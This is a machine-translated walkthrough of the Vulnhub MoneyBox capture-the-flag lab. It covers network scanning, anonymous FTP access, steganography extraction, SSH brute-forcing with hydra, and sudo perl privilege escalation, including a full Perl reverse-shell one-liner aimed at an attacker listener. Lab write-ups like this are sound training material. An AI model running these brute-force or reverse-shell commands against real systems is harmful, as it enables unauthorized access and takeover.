当前位置:网站首页>Vulnhub-Moneybox

Vulnhub-Moneybox

2022-07-05 15:37:00 GALi_ two hundred and thirty-three

Description

The target plane comes from vulnhub MONEYBOX 1 . Present in the target 3 individual flag, The goal this time is to get this 3 individual flag, Don't talk too much. Let's start .

 Insert picture description here

Scanning and service identification

Target and Kali In the same network segment , Through two-layer scanning (arp-scan) Survival of the same network segment IP

sudo arp-scan -I eth0 -l  # -I  network card  -l  Local network 

 Insert picture description here

By judgment ,192.168.54.250 For the target address .

Scan the open port of the target

sudo nmap -p- 192.168.54.250 

 Insert picture description here

Find out 21,22,80 port , Service identification of these ports

sudo nmap -p21,22,80 -sV 192.168.54.250 

 Insert picture description here

Found that the goal is open ftp service ,ssh as well as web service

Vulnerability scanning

Use nmap Use the default script to scan for service vulnerabilities

sudo nmap -p21 -sC 192.168.54.250   # -sC  Default script 

 Insert picture description here

The scan found ftp Anonymous login vulnerability exists

 Insert picture description here

ssh and http The service found nothing unusual

Sorting and analysis

Anonymous user login

First use the anonymous login vulnerability found

 Insert picture description here

Use the account and password anonymous/anonymous Landing successful , And found a picture trytofind.jpg

Download the picture locally ( Pictures may contain some information )

 Insert picture description here

visit web service

 Insert picture description here

View source discovery , No information was found

Catalog explosion

Website directory (dirsearch Need to install )

dirsearch -u http://192.168.54.250/

 Insert picture description here

Found a blog page

 Insert picture description here

According to the content of the page , Tips found in the page source code , There is a secret directory S3cr3t-T3xt

 Insert picture description here

Access directory

 Insert picture description here

A key is found in the source code of the page 3xtr4ctd4t4

 Insert picture description here

Picture steganography

adopt strings Command to check whether there is any obvious character information in the picture

strings trytofind.jpg  

 Insert picture description here

Although I didn't see the obvious information directly , But see abnormal characters , What is inserted in the guest picture

use steghide Look at the inserted data

steghide info trytofind.jpg

 Insert picture description here

Find out you need a password , Use the previously obtained key 3xtr4ctd4t4 Try

success , Found that there was a data.txt file

 Insert picture description here

Extract information

steghide extract -sf trytofind.jpg 

 Insert picture description here

ssh Blast

see data file

 Insert picture description here

Find several keyword eyes , The person's name renu, The password is weak , Can be judged renu It may be an account with weak password , It can be brutally cracked

First, find a dictionary (/usr/share/wordlists/rockyou.txt.gz)

cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz 

You can use it here nmap Of ssh Blasting script , It can also be used. hydra

nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.54.250

Use hydra

hydra -l renu -P rockyou.txt 192.168.54.250 ssh

Crack success

 Insert picture description here

The account password is renu/987654321

obtain Flag

ssh Connect to renu account number

 Insert picture description here

View directory

 Insert picture description here

Successfully get the first Flag

Try sudo To root user

 Insert picture description here

Because it is not in the super user group , Not enough permissions

View history command history

history

 Insert picture description here

 Insert picture description here

Find a lily user , And have passed ssh Traces of landing

 Insert picture description here

Get into home In the directory lily User files , Find the second Flag

Get into lily Under the .ssh The folder and renu Of .ssh Folder

 Insert picture description here

Find out lily Of authorized_keys There is renu The public key , therefore renu You can go directly through ssh Log in to lily account number .

 Insert picture description here

see lily User's permission information

 Insert picture description here

Find out lily Users can use... Without using a password Perl Program

stay kali On the monitor 3334 port

nc -nvlp 3334

utilize perl Program running rebound shell

sudo perl -e 'use Socket;$i="192.168.54.103";$p=3334;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 Insert picture description here

Successful connection , get root jurisdiction

 Insert picture description here

Get into root root directory

 Insert picture description here

Find out .root.txt file , Get the last Flag

原网站

版权声明
本文为[GALi_ two hundred and thirty-three]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202140513101993.html